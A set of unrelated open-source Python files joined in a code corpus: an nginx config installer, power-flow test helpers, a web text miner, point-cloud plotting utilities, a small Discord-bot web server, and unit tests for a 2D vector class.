    "title": "[SQL] Select 1 from API",
    "type": "sql",
    "tags": [
        "sql"
    ],
    "conf": {
        "dbo": "postgresql://localhost/analytics",
        "sql": "select 1;",
        "parameters": {},
        "kwargs": {},
        "transaction": True,
        "split": False
    }
}
def main():
    """Create the sample SQL job on the configured Mitto instance and
    print the API's response."""
    client = Mitto(
        base_url=BASE_URL,
        api_key=API_KEY
    )
    created = client.create_job(job=JOB)
    print(created)


if __name__ == "__main__":
    sys.exit(main())
| StarcoderdataPython |
233055 | <gh_stars>0
from os import environ as env
import os
import network
import certs
def get_path(website_id):
    """Absolute path of the nginx site config file for ``website_id``."""
    filename = "website_{}.conf".format(website_id)
    return os.path.abspath(os.path.join(env['NGINX_SITES_DIR'], filename))
def deal_with_certs(website_id, domain):
    """Ensure TLS certificates are in place for ``domain``.

    Copies existing certificates into place when present, otherwise tries
    to generate them first. Returns True when certificates end up
    available, False when generation failed.
    """
    if certs.has_certs(website_id, domain):
        certs.copy_certs(website_id, domain)  # just in case
        print("Website already has certs")
        return True

    print("Website does not have certs, generating..")
    certs.get_cert(website_id, domain)

    if not certs.has_certs(website_id, domain):
        print("it did not work.")
        return False

    print("it worked!")
    certs.copy_certs(website_id, domain)
    return True
def install(website_id, domain, use_https):
    """Render and write the nginx site config for ``domain``, then reload.

    When HTTPS is requested, certificates are provisioned first; if that
    fails the site silently falls back to the plain-HTTP template.
    """
    if use_https:
        # turn off use_https if cert provisioning fails
        use_https = deal_with_certs(website_id, domain)

    ip_addr = network.get_webserver_ip(website_id)
    dest_path = get_path(website_id)

    template = 'nginx-template-https.conf' if use_https else 'nginx-template.conf'
    with open(template, 'r') as tpl:
        rendered = (
            tpl.read()
            .replace('REPLACEME_DOMAIN', domain)
            .replace('REPLACEME_IPADDR', ip_addr)
        )

    with open(dest_path, 'w') as dest_file:
        dest_file.write(rendered)

    reload_nginx()
def uninstall(website_id):
    """Remove the site's nginx config file (if present) and reload nginx."""
    # EAFP: removing unconditionally and ignoring a missing file closes the
    # check-then-remove race in the original exists()/remove() pair.
    try:
        os.remove(get_path(website_id))
    except FileNotFoundError:
        pass
    reload_nginx()
def reload_nginx():
    """Run the reload command from NGINX_RELOAD_COMMAND, if configured."""
    command = env.get('NGINX_RELOAD_COMMAND')
    if command is not None:
        os.system(command)
| StarcoderdataPython |
1838262 | #*****************************************************#
# This file is part of GRIDOPT. #
# #
# Copyright (c) 2015-2017, <NAME>. #
# #
# GRIDOPT is released under the BSD 2-clause license. #
#*****************************************************#
import os
import csv
from os import listdir
from os.path import join
# Resource locations used by the power-flow test helpers below.
DIR_CASES = join('.', 'tests', 'resources', 'cases')
DIR_PFSOL = join('.', 'tests', 'resources', 'pf_solutions')

# Every network case file, sorted for deterministic test ordering.
# NOTE: listdir() runs at import time, so DIR_CASES must exist.
test_cases = [join(DIR_CASES, f) for f in listdir(DIR_CASES)]
test_cases.sort()
def get_pf_solution_file(case_file, dir, sol):
    """
    Gets power flow solution file path.

    The solution file lives in ``dir`` and is named after the case file's
    basename with the solution code appended as an extra extension.

    Parameters
    ----------
    case_file : path to case file (string)
    dir : path to solution file directory (string)
    sol : solution code extension (string)

    Returns
    -------
    sol_file : path to solution file (string)
    """
    case_name = case_file.split(os.sep)[-1]
    return join(dir, '{}.{}'.format(case_name, sol))
def read_pf_solution_file(sol_file):
    """
    Reads contents of power flow solution file.

    The expected format is CSV: a first row with the voltage magnitude and
    angle tolerances, a header row, then one row per bus with
    (bus number, code, v_mag, v_ang).

    Parameters
    ----------
    sol_file : path to solution file (string)

    Returns
    -------
    sol_data : solution data (dictionary), or None if the file cannot
               be opened
    """
    try:
        # ``with`` guarantees the handle is closed even when parsing raises,
        # fixing the descriptor leak in the original open()-without-close.
        with open(sol_file) as f:
            reader = csv.reader(f, delimiter=',')
            v_mag_tol, v_ang_tol = list(map(float, next(reader)))
            next(reader)  # header
            bus_data = {}
            for row in reader:
                bus_number = int(row[0])
                # row[1] is the bus code, unused here
                bus_data[bus_number] = {'v_mag': float(row[2]),  # p.u.
                                        'v_ang': float(row[3])}  # degrees
            return {'v_mag_tol': v_mag_tol,
                    'v_ang_tol': v_ang_tol,
                    'bus_data': bus_data}
    except IOError:
        # missing/unreadable file: preserve the original None contract
        return None
| StarcoderdataPython |
4944133 | from BeautifulSoup import BeautifulSoup
from collections import defaultdict
import re
import hashlib
import json
import nltk
import sys
from datetime import datetime
import urllib
import urllib2
from threading import Thread
import extract
import operator
from BeautifulSoup import BeautifulSoup
class WebsiteMiner(Thread):
def __init__(self, category):
super(WebsiteMiner, self).__init__()
self.category = category
self.mined_posts_hashes = []
def run(self):
self.log("Starting mining.")
urls = self.category.urls.split(',')
for url in urls:
try:
visible_text, last_modified = self.download_page(url)
text_hash = hashlib.sha1(visible_text.encode('utf-8'))
if text_hash not in self.mined_posts_hashes:
terms_dict = extract.extract_terms(visible_text)
now = datetime.now().strftime('%Y%m%d%H%M')
time = last_modified.strftime('%Y%m%d%H%M')
post = WebsiteMiner.dict_of_post(url, terms_dict, time, now)
batch = WebsiteMiner.package_batch_to_json(self.category.id, [post])
self.send_to_parent(self.category.parent_id, batch)
self.mined_posts_hashes.append(hash)
else:
print("Post already mined.")
except Exception as e:
print e.message, e.args
def stop(self):
self.log("Stopping mining.")
def log(self, text):
print "Miner:{} - {}".format(self.category.id, text)
# website specific static methods
def download_page(self, uri):
try:
res = urllib.urlopen(uri)
info = dict(res.info())
time = datetime.now()
if 'last-modified' in info:
time_str = info['last-modified']
time = datetime.strptime(time_str, '%a, %d %b %Y %H:%M:%S %Z')
html = res.read()
soup = BeautifulSoup(html)
text = self.find(soup, 'p') \
+ self.find(soup, 'h1') \
+ self.find(soup, 'h2') \
+ self.find(soup, 'h3')
return text, time
except:
print "Error loading " + uri, sys.exc_info()
return ""
def find(self, soup, tag):
elements = soup.findAll(tag)
lines = [e.text for e in elements if len(e.text) > 0]
return ' '.join(lines)
# standard engine communication static methods
@staticmethod
def send_to_parent(url, data):
url += "/v1/minerpost"
req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
try:
urllib2.urlopen(req)
except Exception as e:
print "Exception while sending data to engine at the uri: {}".format(url)
print e
@staticmethod
def dict_of_post(post_url, terms_dict, last_modified, mined_at):
post = {
"terms": terms_dict,
"url": post_url,
"datetime": last_modified,
"mined_at": mined_at
}
return post
@staticmethod
def package_batch_to_json(id_of_miner, posts):
values = {
"posts": posts,
"miner_id": id_of_miner
}
data = json.dumps(values)
return data
| StarcoderdataPython |
3553481 | <reponame>mattjudge/field-photogrammetric-reconstruction
"""
Author: <NAME> 2017, except `set_axes_equal`
This module provides:
:class:`Pointcloud` as a container for point clouds and associated projection matrices
:func:`align_points_with_xy` to align point clouds on the XY plane
:func:`visualise_heatmap` to interpolate and render pre-binned point clouds
"""
import logging
import os
import errno
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
import matplotlib.pyplot as plt
from scipy import interpolate, ndimage
from scipy.io import savemat
class PointCloud:
    """Container for a point cloud and the projection matrices it came from."""

    def __init__(self, points, imageshape, P1, P2, R, t):
        """
        Container for a point cloud and related projection matrices
        :param points: A 3xN homogeneous array of [X, Y, Z]^T points in 3D space
        :param imageshape: The (y,x) image shape from which the points were obtained
        :param P1: The projection matrix of the first frame camera
        :param P2: The projection matrix of the second frame camera
        :param R: The rotation mapping the first camera to the second, followed by translation t
        :param t: The translation mapping the first camera to the second after rotation R
        """
        # np.prod replaces np.product, which was deprecated and removed in NumPy 2.0.
        assert points.shape == (3, np.prod(imageshape))  # check dimensions
        self.points = points
        self.imageshape = imageshape
        self.P1 = P1
        self.P2 = P2
        self.R = R
        self.t = t

    def get_shaped(self):
        """
        :return: A [Y,X,3] array of self.points reshaped into self.imageshape
        """
        return np.dstack([
            self.points[0, :].reshape(self.imageshape),
            self.points[1, :].reshape(self.imageshape),
            self.points[2, :].reshape(self.imageshape)
        ])
def align_points_with_xy(points):
    """
    Applies rotation and translation to align a point cloud with the xy plane.

    A least-squares plane z = c0*x + c1*y + c2 is fitted through the finite
    points, the per-axis median is subtracted, and the cloud is rotated so the
    fitted plane normal maps onto the z axis.

    Maths Ref: http://math.stackexchange.com/questions/1167717/transform-a-plane-to-the-xy-plane
    :param points: [3,N] numpy array of points to align (NaNs allowed in z)
    :return: [3,N] numpy array of aligned points
    """
    # Exclude points whose z coordinate is NaN from the plane fit.
    notnan_points = points[:, ~np.isnan(points[-1, :])]
    # Design matrix [x, y, 1] for the least-squares plane fit.
    a = np.hstack((notnan_points[:-1, :].T, np.ones((notnan_points.shape[1], 1))))
    # rcond=None selects the modern machine-precision cut-off and silences the
    # FutureWarning raised when lstsq is called without an explicit rcond.
    c, _, _, _ = np.linalg.lstsq(a, notnan_points[2, :], rcond=None)
    centroid = np.median(notnan_points, axis=1, keepdims=True)
    logging.info("Centroid: {}".format(centroid))
    # Angle between the fitted plane normal (-c0, -c1, 1) and the z axis.
    cos_t = 1 / np.sqrt(c[0] ** 2 + c[1] ** 2 + 1)
    sin_t = np.sin(np.arccos(cos_t))
    # Rotation axis: unit vector in the xy plane, perpendicular to the
    # normal's xy projection.
    # NOTE: degenerate (n == 0) when the plane is already horizontal -
    # unchanged from the original behaviour.
    ux = cos_t * -c[1]
    uy = cos_t * c[0]
    n = np.sqrt(ux ** 2 + uy ** 2)
    ux /= n
    uy /= n
    # Axis-angle rotation matrix (Rodrigues' formula for axis (ux, uy, 0)).
    R = np.array([
        [cos_t + ux ** 2 * (1 - cos_t), ux * uy * (1 - cos_t), uy * sin_t],
        [ux * uy * (1 - cos_t), cos_t + uy ** 2 * (1 - cos_t), -ux * sin_t],
        [-uy * sin_t, ux * sin_t, cos_t]
    ])
    return R.dot(points - centroid)
def set_axes_equal(ax):
    """
    Give the three axes of a 3D plot the same scale, so spheres look like
    spheres and cubes like cubes.  Works around Matplotlib's
    ax.set_aspect('equal') / ax.axis('equal') not supporting 3D axes.
    Ref: http://stackoverflow.com/a/31364297
    :param ax: a matplotlib 3D axis, e.g. as returned by plt.gca().
    :return: None
    """
    limits = [ax.get_xlim3d(), ax.get_ylim3d(), ax.get_zlim3d()]
    centers = [np.mean(lim) for lim in limits]
    # Half of the largest extent: the bounding box becomes a cube (a "sphere"
    # in the infinity norm) of this radius around each axis centre.
    half_span = 0.5 * max(abs(hi - lo) for lo, hi in limits)
    ax.set_xlim3d([centers[0] - half_span, centers[0] + half_span])
    ax.set_ylim3d([centers[1] - half_span, centers[1] + half_span])
    ax.set_zlim3d([centers[2] - half_span, centers[2] + half_span])
def _make_dir_for_file(fpath):
"""
Helper function to ensure the path to a file exists and if not, create the required folder structure
:param fpath: Path to file
"""
try:
os.makedirs(os.path.dirname(fpath))
except OSError as e:
if e.errno != errno.EEXIST:
raise
def visualise_heatmap(points, path=None, detail=30, gsigma=0, scale=1, mode='standard'):
    """
    Interpolates a point cloud into a regular grid, rendering a heatmap and optionally saving as .png and .mat files.
    The .mat file can be further processed by external tools into a surface plot.
    :param points: A [3,N] numpy array of points
    :param path: The path in which to save output files. No files will be saved if set to None.
    :param detail: The detail with which to interpolate the point cloud
    :param gsigma: The level of gaussian smoothing to apply (default to 0, no smoothing)
    :param scale: Scale to apply to the 3 axis, defaults to 1
    :param mode: Either 'standard' or 'cutthru'.
        'standard': Render a standard heatmap
        'cutthru': Include two cross sectional lines
    :return: the matplotlib figure that was rendered
    """
    # Drop points whose z coordinate is NaN before computing grid bounds.
    pts = points[:, ~np.isnan(points[-1, :])]
    xmin, ymin, zmin = np.floor(np.min(pts, axis=1)).astype(int)
    xmax, ymax, zmax = np.ceil(np.max(pts, axis=1)).astype(int)
    logging.info("data shape: {}".format(pts.shape))
    logging.info("data min : {}".format(np.min(pts, axis=1)))
    logging.info("data max : {}".format(np.max(pts, axis=1)))
    # Regular grid with `detail` samples per unit in both x and y.
    xarr, yarr = np.arange(xmin, xmax, 1 / detail), np.arange(ymin, ymax, 1 / detail)
    X, Y = np.meshgrid(xarr, yarr)
    logging.info("X shape: {}".format(X.shape))
    logging.info("Y shape: {}".format(Y.shape))
    print("Interpolating Z")
    # Linear scattered-data interpolation onto the grid; the sign flip turns
    # depth values into heights.
    Z = -interpolate.griddata(np.vstack([pts[0, :], pts[1, :]]).T, pts[2, :].T,
                              np.vstack([X.flatten(), Y.flatten()]).T, method='linear'
                              ).reshape(X.shape)
    logging.info("Z shape: {}".format(Z.shape))
    if gsigma > 0:
        Z = ndimage.gaussian_filter(Z, sigma=gsigma, order=0)
    logging.info("Final Z shape: {}".format(Z.shape))
    print("Rendering")
    # scale XYZ
    X /= scale
    Y /= scale
    Z /= scale
    if mode == 'standard':
        fig = plt.figure()
        ax = fig.gca()
        p = plt.imshow(Z, cmap='gray',  # cmap='hot',
                       extent=(np.min(X), np.max(X), np.max(Y), np.min(Y)),
                       interpolation='nearest', aspect='equal', origin='upper')  # set the aspect ratio to auto to fill the space.
        ax.set_xlabel('x [m]')
        ax.set_ylabel('y [m]')
        cb = fig.colorbar(p)
        cb.set_label('Crop height deviation (z) [m]')
    elif mode == 'cutthru':
        # create a 2 X 2 grid
        # gs = grd.GridSpec(3, 2, height_ratios=[6, 1, 1], width_ratios=[10, 1], wspace=0.2)
        fig, axes = plt.subplots(3, 2, sharex='col', subplot_kw=dict(),
                                 gridspec_kw=dict(height_ratios=[4, 1, 1], width_ratios=[10, 1], wspace=0.2))
        # image plot
        ax = axes[0, 0]
        p = ax.imshow(Z, cmap='gray',
                      extent=(np.min(X), np.max(X), np.max(Y), np.min(Y)),
                      interpolation='nearest', aspect='equal', origin='upper')  # set the aspect ratio to auto to fill the space.
        # ax.set_xlabel('x [m]')
        ax.set_ylabel('y [m]')
        # NOTE(review): negative row indices assume the interpolated grid has
        # more than 500 rows - confirm for small inputs.
        rowA = -500
        rowB = -200
        ax.plot((np.min(X), np.max(X)), (Y[rowA, 0], Y[rowA, -1]), 'b-')
        ax.plot((np.min(X), np.max(X)), (Y[rowB, 0], Y[rowB, -1]), 'r-')
        # color bar in it's own axis
        colorAx = axes[0, 1]
        cb = plt.colorbar(p, cax=colorAx)
        cb.set_label('Crop height deviation (z) [m]')
        # line plot
        ax2 = axes[1, 0]
        ax2.spines['right'].set_visible(False)
        ax2.spines['top'].set_visible(False)
        ax2.xaxis.set_ticks_position('bottom')
        ax2.yaxis.set_ticks_position('left')
        # ax2.set_aspect('auto')
        # ax2.set_xlabel('x [m]')
        ax2.set_ylabel('z [m]')
        ax2.set_xlim((np.min(X), np.max(X)))
        ax2.plot(X[rowA, :], Z[rowA, :], "b-")
        # line plot
        ax3 = axes[2, 0]
        ax3.spines['right'].set_visible(False)
        ax3.spines['top'].set_visible(False)
        ax3.xaxis.set_ticks_position('bottom')
        ax3.yaxis.set_ticks_position('left')
        ax3.set_xlabel('x [m]')
        ax3.set_ylabel('z [m]')
        ax3.set_xlim((np.min(X), np.max(X)))
        ax3.plot(X[rowB, :], Z[rowB, :], "r-")
        # hide unwanted
        axes[1, 1].axis('off')
        axes[2, 1].axis('off')
    else:
        raise ValueError('Unknown render mode')
    if path is not None:
        path = '{}_gsigma{}'.format(path, gsigma)
        _make_dir_for_file(path)
        fig.savefig('{}_mode{}.pdf'.format(path, mode), dpi=1000)
        # The .mat export allows external tools (e.g. MATLAB) to re-render.
        savemat('{}.mat'.format(path), {
            'X': X,
            'Y': Y,
            'Z': Z
        })
    plt.show()
    return fig
def _visualise_worlds_mplotlib(*worlds, method="surf", fname=None):
    """
    Legacy function to produce a surface render using matplotlib
    :param worlds: one or more PointCloud objects to render
    :param method: "surf" for a surface plot, anything else for a scatter plot
    :param fname: optional path to save the rendered figure to
    :return: the matplotlib pyplot module after rendering
    """
    fig = plt.figure()
    # NOTE(review): fig.gca(projection='3d') was removed in matplotlib >= 3.6;
    # this legacy helper requires an older matplotlib - confirm before reuse.
    ax = fig.gca(projection='3d')
    ax.set_aspect('equal')
    ax.set_xlabel('x')
    ax.set_ylabel('y')
    ax.set_zlabel('z')
    if method == "surf":
        if len(worlds) == 1:
            shaped = worlds[0].get_shaped()
            X, Y, Z = shaped[:, :, 0], shaped[:, :, 1], shaped[:, :, 2]
            logging.info("Z range: {}, {}".format(np.nanmin(Z), np.nanmax(Z)))
            surf = ax.plot_surface(X, Y, Z, cmap=cm.hot, linewidth=0, antialiased=False,
                                   vmin=np.nanmin(Z), vmax=np.nanmax(Z))  # these limits seem to make it less
            # sharp, but are required to deal with NaNs
            surf.cmap.set_under('black')
            fig.colorbar(surf, extend='both')
        else:
            # Several clouds: draw each as a coarse (10x10 patch) surface.
            for i, world in enumerate(worlds):
                shaped = world.get_shaped()
                X, Y, Z = shaped[:, :, 0], shaped[:, :, 1], shaped[:, :, 2]
                surf = ax.plot_surface(X, Y, Z, linewidth=0, antialiased=False, rcount=10, ccount=10)#, color=('r','g','b','y')[i])
    else:
        # method == "scatter"
        # requires heavy graphics
        for world in worlds:
            X, Y, Z = world.points
            ax.scatter(X, Y, Z, linewidth=0, antialiased=False, marker="o")
    set_axes_equal(ax)
    if fname is not None:
        _make_dir_for_file(fname)
        plt.savefig(fname)
    plt.show()
    return plt
def _visualise_world_visvis(X, Y, Z, format="surf"):
    """
    Legacy function to produce a surface render using visvis
    :param X: 2D array of x grid coordinates
    :param Y: 2D array of y grid coordinates
    :param Z: 2D array of heights over the (X, Y) grid
    :param format: "surf" for a surface render, anything else for points
    """
    # Imported lazily so visvis is only required when this helper is used.
    import visvis as vv
    # m2 = vv.surf(worldx[::detail], worldy[::detail], worldz[::detail])
    app = vv.use()
    # prepare axes
    a = vv.gca()
    a.cameraType = '3d'
    a.daspectAuto = False
    # print("view", a.camera.GetViewParams())
    # a.SetView(loc=(-1000,0,0))
    # a.camera.SetView(None, loc=(-1000,0,0))
    if format == "surf":
        l = vv.surf(X, Y, Z)
        # NOTE(review): these axis limits are hard-coded for a particular
        # dataset scale - confirm before reusing with other data.
        a.SetLimits(rangeX=(-0.2, 0.2), rangeY=(-0.5, 0.5), rangeZ=(-0.5, 0), margin=0.02)
    else:
        # draw points
        pp = vv.Pointset(np.concatenate([X.flatten(), Y.flatten(), Z.flatten()], axis=0).reshape((-1, 3)))
        l = vv.plot(pp, ms='.', mc='r', mw='5', ls='', mew=0)
        l.alpha = 0.2
    # Blocking call: runs the visvis GUI event loop.
    app.Run()
| StarcoderdataPython |
class C(tuple):
    """Tuple subclass that attaches an extra attribute during construction.

    tuple is immutable, so the payload has to be set up in __new__ rather
    than __init__; this variant calls tuple.__new__ explicitly.
    """

    def __new__(cls, tpl, val):
        print("C.__new__")
        instance = tuple.__new__(cls, tpl)
        assert type(instance) is C
        instance.val = val
        return instance
# Smoke test: construction preserves the subclass type and the attribute.
o = C((1, 2), 3)
assert type(o) is C
print(o)
print(o.val)
print("--")
class C(tuple):
    """Same construction check as above, but delegating through the
    zero-argument form of super() instead of naming tuple directly."""

    def __new__(cls, tpl, val):
        print("C.__new__")
        instance = super().__new__(cls, tpl)
        assert type(instance) is C
        instance.val = val
        return instance
# Same smoke test for the super()-based variant.
o = C((1, 2), 3)
assert type(o) is C
print(o)
print(o.val)
| StarcoderdataPython |
8124444 | <reponame>DuckMcFuddle/forum-sweats
from aiohttp import web
from . import discordbot, commands
import asyncio
import os
# aiohttp route table shared by all handlers below.
routes = web.RouteTableDef()
# Health-check endpoint: returns a trivial body so uptime monitors get a 200.
@routes.get('/')
async def index(request):
    return web.Response(text='e')
# Remote kill switch: terminates the whole process when the caller presents
# the bot token as ?token=... (compared against the 'token' env var).
@routes.get('/kill')
async def kill_bot(request):
    if request.query.get('token') == os.getenv('token'):
        exit()
    return web.Response(text='e')
# JSON dump of the member list as collected by the discord bot module.
@routes.get('/api/members')
async def api_members(request):
    return web.json_response(discordbot.api_get_members())
def start_server(loop, background_task, client):
    """Start the aiohttp web server and schedule the bot's background task.

    :param loop: asyncio event loop to attach the server and task to
    :param background_task: coroutine scheduled alongside the web app
    :param client: discord client object, exposed to handlers as app.discord
    """
    global app
    asyncio.set_event_loop(loop)
    app = web.Application(
    )
    app.discord = client
    app.add_routes(routes)
    # Schedule the bot coroutine on the same loop the web app will use.
    asyncio.ensure_future(
        background_task,
        loop=loop
    )
    # Blocking call: runs the event loop until the application is stopped.
    web.run_app(
        app,
        port=8081
    )
| StarcoderdataPython |
11395799 | <reponame>TovarnovM/easyvec<filename>tests/test_vec2.py
from easyvec import Vec2
import numpy as np
from pytest import approx
# --- Vec2 construction and tolerance-based equality tests ---
def test_constructor1():
    v = Vec2(1,2)
    assert v is not None
    assert v.x == approx(1)
    assert v.y == approx(2)
def test_constructor2():
    v = Vec2.from_list([1, 2])
    assert v == (1, 2)
    assert v.x == approx(1)
    assert v.y == approx(2)
def test_constructor3():
    v = Vec2.from_dict({'x': 1, 'y': 2})
    assert v == (1, 2)
    assert v.x == approx(1)
    assert v.y == approx(2)
# Equality uses the library tolerance: differences well below CMP_TOL compare
# equal, differences above it do not.
def test_cmp1():
    from easyvec.vectors import get_CMP_TOL
    v1 = Vec2(1,2)
    v2 = Vec2(1 + get_CMP_TOL()/10, 2 + get_CMP_TOL()/10)
    assert v1 == v2
def test_cmp2():
    from easyvec.vectors import get_CMP_TOL
    v1 = Vec2(1,2)
    v2 = Vec2(1 + get_CMP_TOL()*2, 2 + get_CMP_TOL()/10)
    assert (v1 == v2) == False
def test_cmp3():
    from easyvec.vectors import get_CMP_TOL
    v1 = Vec2(1,2)
    v2 = Vec2(1 + get_CMP_TOL()*2, 2 + get_CMP_TOL()/10)
    assert v1 != v2
# Comparison also works against tuples, lists and numpy arrays.
def test_cmp4():
    assert Vec2(-1, 1.11) == (-1, 1.11)
def test_cmp5():
    assert Vec2(-1, 1.11) == [-1, 1.11]
def test_cmp6():
    assert Vec2(-1, 1.11) != np.array([-1, 1.111])
# --- addition, iterable/keyword unpacking and subtraction tests ---
def test_add1():
    assert Vec2(2,3) + Vec2(3,2) == Vec2(5,5)
def test_add2():
    assert Vec2(2,3) + (3,2) == Vec2(5,5)
def test_add3():
    assert Vec2(2,3) + [3,2] == Vec2(5,5)
def test_add4():
    import numpy as np
    assert Vec2(2,3) + np.array([3,2]) == Vec2(5,5)
def test_add5():
    assert Vec2(2,3) + 3 == Vec2(5,6)
def test_add6():
    import numpy as np
    assert [33,22] + Vec2(2,3) == Vec2(35,25)
def test_add7():
    assert (3,2) + Vec2(2,3) == Vec2(5,5)
def test_add8():
    import numpy as np
    assert Vec2(5,5) == np.array([3,2]) + Vec2(2,3).as_np()
def test_add9():
    assert 3 + Vec2(2,3) == Vec2(5,6)
def test_add10():
    assert [33,22] + Vec2(2,3) == Vec2(35,25)
# Vec2 supports iterable unpacking (x, y order) and ** mapping unpacking.
def test_unpack1():
    x, y = Vec2(-7,8)
    assert x == -7
    assert y == 8
def test_unpack2():
    def foo(x, y):
        return x, y
    x,y = foo(*Vec2(-7,8))
    assert x == -7
    assert y == 8
def test_unpack4():
    def foo(x, y):
        return x, y
    x,y = foo(**Vec2(-7,8))
    assert x == -7
    assert y == 8
def test_sub1():
    assert Vec2(1,2) - Vec2(3,5) == (-2, -3)
def test_sub2():
    assert Vec2(1, 2) - (3, 5) == [-2, -3]
def test_sub3():
    assert (1, 2) - Vec2(3, 5) == (-2, -3)
def test_sub4():
    assert Vec2(3, 5) - [1, 6] == (2, -1)
def test_sub5():
    assert [1, 6] - Vec2(3, 5) == (-2, 1)
def test_sub6():
    import numpy as np
    assert Vec2(1, 2) - np.array([3, 5]) == (-2, -3)
def test_sub7():
    assert 6 - Vec2(3, 5) == (3, 1)
def test_sub8():
    assert Vec2(3, 5) - 7 == (-4, -2)
# --- in-place add/sub and (element-wise / scalar) multiplication tests ---
def test_iadd1():
    v = Vec2(1, 2)
    v += Vec2(3, 5)
    assert v == Vec2(4, 7)
def test_iadd2():
    v = Vec2(1, 2)
    v += (3, 5)
    assert v == (4, 7)
def test_iadd3():
    v = Vec2(1, 2)
    v += 3
    assert v == (4, 5)
def test_iadd4():
    v = Vec2(1, 2)
    v += [3, 10]
    assert v == (4, 12)
def test_iadd5():
    import numpy as np
    v = Vec2(1, 2)
    v += np.array([3, 10])
    assert v == (4, 12)
def test_isub1():
    v = Vec2(1, 2)
    v -= Vec2(3, 5)
    assert v == Vec2(-2, -3)
def test_isub2():
    v = Vec2(1, 2)
    v -= (3, 5)
    assert v == (-2, -3)
def test_isub3():
    v = Vec2(1, 2)
    v -= 3
    assert v == (-2, -1)
def test_isub4():
    v = Vec2(1, 2)
    v -= [3, 10]
    assert v == [-2, -8]
def test_isub5():
    import numpy as np
    v = Vec2(1, 2)
    v -= np.array([3, 10])
    assert v == (-2, -8)
# NOTE: vector * vector is the dot product (a scalar), vector * scalar is
# element-wise scaling.
def test_mul1():
    assert Vec2(1, 2) * 3 == (3,6)
def test_mul2():
    assert Vec2(1, 2) * (2, -1) == approx(0)
def test_mul3():
    assert Vec2(1, 2) * [2, -1] == approx(0)
def test_mul4():
    assert Vec2(1, 2) * Vec2(2, -1) == approx(0)
def test_mul5():
    import numpy as np
    assert Vec2(1, 2) * np.array([2, -1]) == approx(0)
def test_mul11():
    assert 3 * Vec2(1, 2) == (3,6)
def test_mul21():
    assert (2, -1) * Vec2(1, 2) == approx(0)
def test_mul31():
    assert [2, -1] * Vec2(1, 2) == approx(0)
# In-place multiplication is always element-wise.
def test_imul1():
    v = Vec2(1, 2)
    v *= Vec2(3, 5)
    assert v == Vec2(3, 10)
def test_imul2():
    v = Vec2(1, 2)
    v *= (3, 5)
    assert v == (3, 10)
def test_imul3():
    v = Vec2(1, 2)
    v *= 3
    assert v == (3, 6)
def test_imul4():
    v = Vec2(1, 2)
    v *= [3, 10]
    assert v == [3, 20]
def test_imul5():
    import numpy as np
    v = Vec2(1, 2)
    v *= np.array([3, 10])
    assert v == (3, 20)
# --- true division, floor division and modulo tests (incl. in-place) ---
def test_div1():
    assert Vec2(3, 6) / 3 == (1,2)
def test_div2():
    assert Vec2(10, 2) / (2, -1) == (5,-2)
def test_div3():
    assert Vec2(10, 2) / [2, -1] == (5,-2)
def test_div4():
    assert Vec2(10, 2) / Vec2(2, -1) == (5,-2)
def test_div5():
    import numpy as np
    assert Vec2(10, 2) / np.array([2, -1]) == (5,-2)
def test_div11():
    assert 12 / Vec2(3, 4) == (4,3)
def test_div21():
    assert (12, 8) / Vec2(3, 4) == (4,2)
def test_div31():
    assert [12, 8] / Vec2(3, 4) == (4,2)
def test_idiv1():
    v = Vec2(12, 10)
    v /= Vec2(3, 5)
    assert v == Vec2(4, 2)
def test_idiv2():
    v = Vec2(12, 10)
    v /= (3, 5)
    assert v == (4, 2)
def test_idiv3():
    v = Vec2(12, 15)
    v /= 3
    assert v == (4, 5)
def test_idiv4():
    v = Vec2(12, 20)
    v /= [3, 10]
    assert v == [4, 2]
def test_idiv5():
    import numpy as np
    v = Vec2(12, 20)
    v /= np.array([3, 10])
    assert v == (4, 2)
def test_floordiv1():
    assert Vec2(4, 8) // 3 == (1,2)
def test_floordiv2():
    assert Vec2(11, 2.5) // (2, -1) == (5,-3)
def test_floordiv3():
    assert Vec2(11, 2.5) // [2, -1] == (5,-3)
def test_floordiv4():
    assert Vec2(11, 2.5) // Vec2(2, -1) == (5,-3)
def test_floordiv5():
    import numpy as np
    assert Vec2(11, 2.5) // np.array([2, -1]) == (5,-3)
def test_floordiv11():
    assert 12 // Vec2(3, 4) == (4,3)
def test_floordiv21():
    assert (13, 9) // Vec2(3, 4) == (4,2)
def test_floordiv31():
    assert [13, 9] // Vec2(3, 4) == (4,2)
def test_ifloordiv1():
    v = Vec2(13, 12)
    v //= Vec2(3, 5)
    assert v == Vec2(4, 2)
def test_ifloordiv2():
    v = Vec2(13, 12)
    v //= (3, 5)
    assert v == (4, 2)
def test_ifloordiv3():
    v = Vec2(13, 17)
    v //= 3
    assert v == (4, 5)
def test_ifloordiv4():
    v = Vec2(13, 24)
    v //= [3, 10]
    assert v == [4, 2]
def test_ifloordiv5():
    import numpy as np
    v = Vec2(13, 24)
    v //= np.array([3, 10])
    assert v == (4, 2)
def test_mod1():
    assert Vec2(4, 8) % 3 == (1,2)
def test_mod2():
    assert Vec2(11, 2.1) % (2, -1) == (1,0.1)
def test_mod3():
    assert Vec2(11, 2.9) % [2, -1] == (1,0.9)
def test_mod4():
    assert Vec2(11, 2.1) % Vec2(2, -1) == (1,0.1)
def test_mod5():
    import numpy as np
    assert Vec2(11, 2.1) % np.array([2, -1]) == (1,0.1)
def test_mod11():
    assert 13 % Vec2(3, 5) == (1,3)
def test_mod21():
    assert (13, 10) % Vec2(3, 4) == (1,2)
def test_mod31():
    assert [13, 9] % Vec2(3, 4) == (1,1)
def test_imod1():
    v = Vec2(13, 12)
    v %= Vec2(3, 5)
    assert v == Vec2(1, 2)
def test_imod2():
    v = Vec2(13, 12)
    v %= (3, 5)
    assert v == (1, 2)
def test_imod3():
    v = Vec2(13, 17)
    v %= 3
    assert v == (1, 2)
def test_imod4():
    v = Vec2(13, 24)
    v %= [3, 10]
    assert v == [1, 4]
def test_imod5():
    import numpy as np
    v = Vec2(13, 24)
    v %= np.array([3, 10])
    assert v == (1, 4)
# --- length, abs, normalisation, rounding and geometric operation tests ---
def test_len1():
    v = Vec2(10,0)
    assert v.len() == approx(10)
    assert v.len_sqared() == approx(100)
def test_len2():
    v = Vec2(0,-10)
    assert v.len() == approx(10)
    assert v.len_sqared() == approx(100)
def test_len3():
    v = Vec2(10,10)
    assert v.len() == approx(10*2**0.5)
    assert v.len_sqared() == approx(200)
def test_abs1():
    v = Vec2(-2,-3)
    assert v.abs() == abs(v)
    assert v.abs() == (2,3)
def test_abs2():
    v = Vec2(2,-3)
    assert v.abs() == abs(v)
    assert v.abs() == (2,3)
